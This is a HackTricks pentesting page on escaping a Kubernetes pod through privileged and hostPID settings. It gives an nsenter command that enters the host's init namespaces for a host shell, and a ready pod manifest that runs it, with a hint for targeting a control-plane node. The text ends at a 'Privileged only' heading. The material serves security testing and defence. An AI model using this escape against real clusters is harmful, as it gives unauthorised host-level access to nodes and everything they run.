hacktricks/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md

Pod Escape Privileges

Privileged and hostPID

With these privileges you will have access to the hosts processes and enough privileges to enter inside the namespace of one of the host processes.
Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).

Just executing something like the following will allow you to escape from the pod:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Configuration example:

apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid-exec-pod
  labels:
    app: pentest
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid-pod
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Privileged only